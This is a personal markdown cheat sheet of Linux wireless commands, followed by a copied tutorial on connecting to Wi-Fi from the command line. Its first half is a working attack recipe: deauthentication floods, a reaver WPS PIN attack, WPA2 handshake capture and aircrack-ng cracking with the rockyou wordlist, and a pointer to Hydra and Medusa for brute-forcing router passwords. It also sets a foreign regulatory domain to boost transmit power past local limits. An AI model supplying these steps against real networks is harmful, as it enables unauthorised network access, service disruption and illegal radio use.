

### Scan:
- enable monitor mode: `airmon-ng start wlan1`
- show networks with open WPS: `wash -i mon0`
- to test injection: `aireplay-ng --test mon0`

### Hack

#### Show hidden ESSID:
- Scan channel: `airodump-ng -c 1  mon0`
- Deauth attack: `aireplay-ng -0 2 -a $SSID mon0`

#### WPS attack:
- Reaver: `reaver -i mon0 -b $SSID -vv -d 5 -N -S -E`


#### WPA2 - aircrack-ng

- Capture:

         airodump-ng -w OURFILE -c 1 --bssid 00:03:6F:89:38:58 mon0

- Deauth:

        aireplay-ng -0 0 -a 00:03:6F:89:38:58 mon0

- Merge multiple capture files

        mergecap -F pcap *.cap -w out.cap

- Match:

        aircrack-ng OUT.cap -w /usr/share/wordlists/rockyou.txt





### Up and connect to Network:
>http://www.blackmoreops.com/2014/09/18/connect-to-wifi-network-from-command-line-in-linux/

- Show devices:  `iw dev`
- UP:  `ifconfig wlan1 up` 
 `ip link set wlan1 up`
 - Connect to open:
 
            iwconfig wlan1 essid <SSID> key s:<PASS> channel <ch>

- Check the connection status – WiFi network from command line `iw wlan1 link`
- show all networks around `iw wlan1 scan | grep SSID`


- Set max power:

set default regdomain:

	vim /etc/default/crda	

setup:

	ifconfig wlan1 down 
	iw reg set BO
	ifconfig wlan1 up
	iwconfig wlan1 channel 13 
	iwconfig wlan1 txpower 30 
	iwconfig wlan1
	
	ifconfig wlan1 down && iw reg set BO && ifconfig wlan1 up && iwconfig wlan1 channel 13 && iwconfig wlan1 txpower 30


        ifconfig wlan1 down && iw reg set GY && iwconfig wlan1 txpower 30 && ifconfig wlan1 up && iwconfig wlan1
         
if it doesnt work:

     ifconfig wlan1 down && iw reg set GY && ifconfig wlan1 up  && iwconfig wlan1 txpower 30 && iwconfig wlan1 && iw reg get

### Other
- Brute Force Router Password
>Hydra and Medusa are probably the de facto for bruteforcing credentials.

- Sniff-detecting: `nmap --script=sniffer-detect 192.168.x.0/24`

### Resolve errors: 

#### Change region:
- check region: `iw reg get`
- set region `iw reg set BO`


- Durring `ifconfig wlan1 up` appears error 'RTNETLINK answers: Operation not possible due to RF-kill'
    >http://www.geekmind.net/2011/01/linux-wifi-operation-not-possible-due.html

			      rfkill list all 
	
				  -> if "Soft blocked: yes"
			      rfkill unblock wifi
			      rfkill list all
      



---

## wifi Connection:
http://www.blackmoreops.com/2014/09/18/connect-to-wifi-network-from-command-line-in-linux/

###Step 1: Find available WiFi adapters – WiFi network from command line
 
    >iw dev
	phy#1
	    Interface wlan1
	        ifindex 4
	        type managed

>This system has 1 physical WiFi adapters.
Designated name: phy#1
Device names: wlan1
Interface Index: 4. Usually as per connected ports (which can be an USB port).
Type: Managed. Type specifies the operational mode of the wireless devices. managed means the device is a WiFi station or client that connects to an access point.


### Step 2: Check device status – WiFi network from command line
By this time many of you are thinking, why two network devices. The reason I am using two is because I would like to show how a connected and disconnected device looks like side by side. Next command will show you exactly that.

You can check that if the wireless device is up or not using the following command:

	> ip link show wlan1
	4: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
	    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

>As you can already see, I got once interface (wlan1) as state UP and wlan1 as state DOWN.
Look for the word “UP” inside the brackets in the first line of the output.
Connect to WiFi network in Linux from command line - Check device status- blackMORE Ops-2
In the above example, wlan1 is not UP. Execute the following command to

###Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFI interface

	ip link set wlan1 up

###Step 4: Check the connection status – WiFi network from command line
You can check WiFi network connection status from command line using the following command

	iw wlan1 link
	>Not connected.

###Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected

	iw wlan1 scan | grep SSID

###Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line
Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.

	wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
	>abcd1234 
1
